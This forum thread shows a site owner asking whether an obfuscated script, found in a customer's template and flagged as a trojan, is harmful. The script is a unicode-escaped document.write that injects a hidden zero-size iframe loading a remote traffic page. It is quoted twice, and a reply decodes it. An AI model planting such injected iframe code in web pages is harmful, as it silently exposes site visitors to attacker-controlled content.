wired code

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    wired code

    '''''<script type="text/javascript">document.write('\u003C\u0069\u0066\u00 72\u0061\u006D\u0065\u0020\u0073\u0072\u0063\u003D \u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u 006E\u0069\u0078\u0069\u0072\u0063\u002E\u0063\u00 6F\u006D\u002F\u0074\u0072\u0061\u0066\u0066\u0069 \u0063\u002E\u0068\u0074\u006D\u006C\u0022\u0020\u 006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u00 64\u0074\u0068\u003D\u0022\u0030\u0022\u0020\u006D \u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u 0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u00 66\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064 \u0065\u0072\u003D\u0022\u0030\u0022\u0020\u0068\u 0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u00 22\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069 \u006E\u0067\u003D\u0022\u004E\u004F\u0022\u0020\u 0077\u0069\u0064\u0074\u0068\u003D\u0022\u0030\u00 22\u003E\u003C\u002F\u0069\u0066\u0072\u0061\u006D \u0065\u003E');</script'''''''

    i have seen this code in one template of my customer, i have removed that code, these code were saying that its trogan by my kaspersky, and the site was not loading, but after moving these code site is working fine now.

    I have copied and paste that code in text file, in my desktop, but now kaspersky is just got hang and removed that whole text file which had lot of data of mine.

    Is it now secure, or something will happens in my pc ? how much harmful these coding are?

    Let me know
    thanks

    #2
    Originally posted by Dillu View Post
    '''''<script type="text/javascript">document.write('\u003C\u0069\u0066\u00 72\u0061\u006D\u0065\u0020\u0073\u0072\u0063\u003D \u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u 006E\u0069\u0078\u0069\u0072\u0063\u002E\u0063\u00 6F\u006D\u002F\u0074\u0072\u0061\u0066\u0066\u0069 \u0063\u002E\u0068\u0074\u006D\u006C\u0022\u0020\u 006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u00 64\u0074\u0068\u003D\u0022\u0030\u0022\u0020\u006D \u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u 0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u00 66\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064 \u0065\u0072\u003D\u0022\u0030\u0022\u0020\u0068\u 0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u00 22\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069 \u006E\u0067\u003D\u0022\u004E\u004F\u0022\u0020\u 0077\u0069\u0064\u0074\u0068\u003D\u0022\u0030\u00 22\u003E\u003C\u002F\u0069\u0066\u0072\u0061\u006D \u0065\u003E');</script'''''''

    i have seen this code in one template of my customer, i have removed that code, these code were saying that its trogan by my kaspersky, and the site was not loading, but after moving these code site is working fine now.

    I have copied and paste that code in text file, in my desktop, but now kaspersky is just got hang and removed that whole text file which had lot of data of mine.

    Is it now secure, or something will happens in my pc ? how much harmful these coding are?

    Let me know
    thanks


    hex
    ,.,


    .,.,.,,
    com site: http://vampist.net
    download site: http://wapdloads.net
    fb: http://www.facebook.com/pmplx

    Comment


      #3
      Originally posted by wapmetal View Post
      hex
      ,.,


      .,.,.,,

      yea it is hex but is it harmful?

      Comment


        #4
        Originally posted by wapmetal View Post
        hex
        Nope not hex its unicode:
        PHP Code:
        <iframe src"http://[remove as im not advertising for them].com/traffic.html" marginwidth="0" marginheight="0" frameborder="0" height="0" scrolling="NO" width="0"></iframe
        Added after 16 minutes:

        to decode unicode open up web browser (pc)
        right click and inspect element on any web page (opens dom inspector)
        goto console tab and write:
        console.log("\u003C\u0069\u0066 more code here");
        and press enter ;)
        Last edited by something else; 17.03.12, 21:28.

        Comment

        Working...
        X